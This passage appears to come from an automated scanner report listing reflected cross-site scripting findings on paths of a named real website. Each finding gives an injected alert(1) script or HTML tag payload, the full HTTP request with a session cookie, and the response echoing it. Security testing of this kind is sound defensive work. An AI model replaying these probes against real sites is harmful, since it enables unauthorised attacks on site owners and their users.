2.3655. http://www.resellerbase.com/detail/8/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4915<script>alert(1)</script>2676a3e5a55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8e4915<script>alert(1)</script>2676a3e5a55/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8e4915<script>alert(1)</script>2676a3e5a55/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3656. http://www.resellerbase.com/detail/8/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 29e01<script>alert(1)</script>4084cabcea4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/search.php29e01<script>alert(1)</script>4084cabcea4?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php29e01<script>alert(1)</script>4084cabcea4?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3657. http://www.resellerbase.com/detail/8/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f3e0b<a>fdf2f500b3a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/search.php?keyword=search...&Submit3=Searchf3e0b<a>fdf2f500b3a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php?keyword=search...&Submit3=Searchf3e0b<a>fdf2f500b3a&opt=2 was not found on this server.</p>
...[SNIP]...

2.3658. http://www.resellerbase.com/detail/8/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload aedc9<a>781a60a5f1c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/search.php?keyword=search...aedc9<a>781a60a5f1c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php?keyword=search...aedc9<a>781a60a5f1c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3659. http://www.resellerbase.com/detail/8/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 990bf<script>alert(1)</script>c53230b72bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/search.php?keyword=search...&Submit3=Search&opt=2&990bf<script>alert(1)</script>c53230b72bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php?keyword=search...&Submit3=Search&opt=2&990bf<script>alert(1)</script>c53230b72bd=1 was not found on this server.</p>
...[SNIP]...

2.3660. http://www.resellerbase.com/detail/8/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload abb9e<a>08a438e34a0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/search.php?keyword=search...&Submit3=Search&opt=2abb9e<a>08a438e34a0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php?keyword=search...&Submit3=Search&opt=2abb9e<a>08a438e34a0 was not found on this server.</p>
...[SNIP]...

2.3661. http://www.resellerbase.com/detail/8/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d4ee4<script>alert(1)</script>131beb39f28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild4ee4<script>alert(1)</script>131beb39f28/8/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild4ee4<script>alert(1)</script>131beb39f28/8/themes/ was not found on this server.</p>
...[SNIP]...

2.3662. http://www.resellerbase.com/detail/8/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70030<script>alert(1)</script>aacf8b4949f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/870030<script>alert(1)</script>aacf8b4949f/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/870030<script>alert(1)</script>aacf8b4949f/themes/ was not found on this server.</p>
...[SNIP]...

2.3663. http://www.resellerbase.com/detail/8/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52271<script>alert(1)</script>d23e1c1c7ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes52271<script>alert(1)</script>d23e1c1c7ca/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes52271<script>alert(1)</script>d23e1c1c7ca/ was not found on this server.</p>
...[SNIP]...

2.3664. http://www.resellerbase.com/detail/8/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de1c9<script>alert(1)</script>a2e066ac0bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/?de1c9<script>alert(1)</script>a2e066ac0bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/?de1c9<script>alert(1)</script>a2e066ac0bd=1 was not found on this server.</p>
...[SNIP]...

2.3665. http://www.resellerbase.com/detail/8/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4b9d6<script>alert(1)</script>c45a55d0e2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4b9d6<script>alert(1)</script>c45a55d0e2f/8/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4b9d6<script>alert(1)</script>c45a55d0e2f/8/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3666. http://www.resellerbase.com/detail/8/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b59d<script>alert(1)</script>fbde98993f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/87b59d<script>alert(1)</script>fbde98993f6/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/87b59d<script>alert(1)</script>fbde98993f6/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3667. http://www.resellerbase.com/detail/8/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5bda7<script>alert(1)</script>b3251cbd557 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes5bda7<script>alert(1)</script>b3251cbd557/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3668. http://www.resellerbase.com/detail/8/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94f05<script>alert(1)</script>237d75f48d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos94f05<script>alert(1)</script>237d75f48d7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3669. http://www.resellerbase.com/detail/8/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 77007<script>alert(1)</script>024f40fc4c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/?77007<script>alert(1)</script>024f40fc4c3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/?77007<script>alert(1)</script>024f40fc4c3=1 was not found on this server.</p>
...[SNIP]...

2.3670. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 26757<script>alert(1)</script>11bda499fcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail26757<script>alert(1)</script>11bda499fcf/8/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail26757<script>alert(1)</script>11bda499fcf/8/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3671. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38ae2<script>alert(1)</script>acab130366a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/838ae2<script>alert(1)</script>acab130366a/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/838ae2<script>alert(1)</script>acab130366a/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3672. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee817<script>alert(1)</script>ca91116781b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themesee817<script>alert(1)</script>ca91116781b/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themesee817<script>alert(1)</script>ca91116781b/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3673. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45ade<script>alert(1)</script>c1adf92647f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos45ade<script>alert(1)</script>c1adf92647f/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos45ade<script>alert(1)</script>c1adf92647f/images/ was not found on this server.</p>
...[SNIP]...

2.3674. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9b24c<script>alert(1)</script>422ed50f0bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images9b24c<script>alert(1)</script>422ed50f0bc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images9b24c<script>alert(1)</script>422ed50f0bc/ was not found on this server.</p>
...[SNIP]...

2.3675. http://www.resellerbase.com/detail/8/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d273<script>alert(1)</script>b17a917daa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

